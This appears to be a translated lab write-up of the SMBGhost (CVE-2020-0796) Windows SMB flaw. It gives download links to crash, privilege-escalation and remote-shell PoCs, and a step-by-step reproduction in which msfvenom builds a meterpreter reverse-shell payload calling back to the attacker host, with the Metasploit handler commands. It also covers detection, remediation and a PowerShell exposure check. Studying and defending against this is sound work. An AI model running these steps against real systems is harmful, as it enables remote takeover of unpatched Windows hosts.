Last updated: 2021-06-04 09:32:48

## Vulnerability overview ##

According to the vulnerability bulletin, when the SMB 3.1.1 protocol handles compressed messages, the data they carry is used directly without any safety check, causing a memory corruption vulnerability that an attacker may exploit to execute arbitrary code remotely. Exploiting it requires no privileges, so a target system only needs to be powered on and reachable to be at risk of compromise.

## Affected versions ##

- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows Server, Version 1903 (Server Core installation)
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows Server, Version 1909 (Server Core installation)

## Vulnerability detection ##

Qi An Xin's detection tool: [download](https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%9/%E6%A3%80%E6%B5%8B/CVE-2020-0796-Scanner.zip)

![Qi An Xin "EternalDarkness" detection][1]

A script from GitHub: [download](https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/SMBGhost-master.zip)

![GitHub script detection][2]

## PoC locations ##

Blue-screen (crash) attack: [download](https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/CVE-2020-0796-PoC-master.zip)

Local privilege escalation: [download](https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/cve-2020-0796-local_static.zip)

Remote shell: [download](https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/SMBGhost_RCE_PoC-master.zip)

## Reproduction ##

Attacker machine: Kali 192.168.23.140
Target machine: Win10 192.168.23.139
Turn off the Win10 firewall.

- **Blue-screen reproduction**

Unzip the blue-screen PoC:

![Unzipped PoC archive][3]

Run the command:

> python3 CVE-2020-0796.py 192.168.23.139

On success, Win10 blue-screens.

![Win10 blue screen][4]

- **Local privilege escalation**

Run the local privilege escalation PoC. On success it opens a window running with SYSTEM privileges.

![SYSTEM-privilege window][5]

- **Remote shell reproduction**

Unzip the remote shell PoC:

![Unzipped remote shell PoC][6]

**1. Generate the reverse-connection payload**

> msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.23.140 LPORT=6666 -f python -o shell.txt

When it finishes, a shell.txt file is generated.

![Generated shell.txt file][7]

**2. Modify the exploit**

Replace `buf` in shell.txt with `USER_PAYLOAD`.

![buf replaced with USER_PAYLOAD][8]

Then open exploit.py and replace the content circled in red below with the content of the modified shell.txt.

![Replaced content][9]

Save the file.

**3. Listen in msf**

Open msf:

> msfconsole
> msf5 > use exploit/multi/handler
> msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
> msf5 exploit(multi/handler) > set lhost 192.168.23.140
> msf5 exploit(multi/handler) > set lport 6666
> msf5 exploit(multi/handler) > run

Then open another terminal and run the PoC:

> python3 exploit.py -ip 192.168.23.139

Wait for it to finish, and you get a shell.

![Shell obtained][10]

## Remediation ##

1. Install the fix Microsoft released for this vulnerability promptly.
2. Close port 445.

[1]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/1.PNG
[2]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/2.PNG
[3]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/1.PNG
[4]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/2.PNG
[5]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/7.PNG
[6]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/3.PNG
[7]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/4.PNG
[8]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/5.PNG
[9]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/6.PNG
[10]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/8.PNG
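As an added example (not part of the original post), the following PowerShell check audits a single host against the two remediation steps above and against Microsoft's documented workaround of disabling SMBv3 compression (ADV200005). It assumes an elevated session on the host being checked, that builds 18362 and 18363 correspond to the 1903 and 1909 versions listed above, and that the March 2020 fix (KB4551762) raised those builds' revision (UBR) to 720 or higher.

```powershell
# Added example, not code from the original post. Run elevated on the host.
# Assumptions: build 18362 = version 1903, 18363 = version 1909 (the affected
# list above); KB4551762 (March 2020) sets the UBR of those builds to >= 720.
function Test-SmbGhostExposure {
    $cv       = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build    = [int]$cv.CurrentBuildNumber
    $ubr      = [int]$cv.UBR
    $affected = @{ 18362 = '1903'; 18363 = '1909' }
    $inList   = $affected.ContainsKey($build)

    # Remediation step 1: is the fixing cumulative update (or later) installed?
    $patched = $inList -and ($ubr -ge 720)

    # Microsoft's ADV200005 workaround: DisableCompression=1 under LanmanServer
    # turns off the SMBv3 compression path the bulletin describes as vulnerable.
    $smbParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $compressionOff = (Get-ItemProperty $smbParams -ErrorAction SilentlyContinue).DisableCompression -eq 1

    # Remediation step 2: an enabled inbound firewall rule that blocks TCP 445.
    $port445Blocked = [bool](
        Get-NetFirewallRule -Direction Inbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
        Get-NetFirewallPortFilter |
        Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -contains '445' })

    [pscustomobject]@{
        Build          = "$build.$ubr"
        Version        = $affected[$build]
        InAffectedList = $inList
        PatchInstalled = $patched
        CompressionOff = $compressionOff
        Port445Blocked = $port445Blocked
        # Exposed only when the build is affected and no mitigation is in place.
        Exposed        = $inList -and -not ($patched -or $compressionOff -or $port445Blocked)
    }
}

$result = Test-SmbGhostExposure
$result | Format-List

if ($result.Exposed) {
    Write-Warning 'Affected build with no patch, no compression workaround and port 445 open.'
    Write-Output 'Apply the workaround and/or block the port (elevated):'
    Write-Output "  Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name DisableCompression -Type DWord -Value 1 -Force"
    Write-Output "  New-NetFirewallRule -DisplayName 'Block inbound SMB 445' -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block"
}
```

Blocking 445 also breaks legitimate file and printer sharing on that host, so the registry workaround or the patch is the preferred fix where SMB is needed.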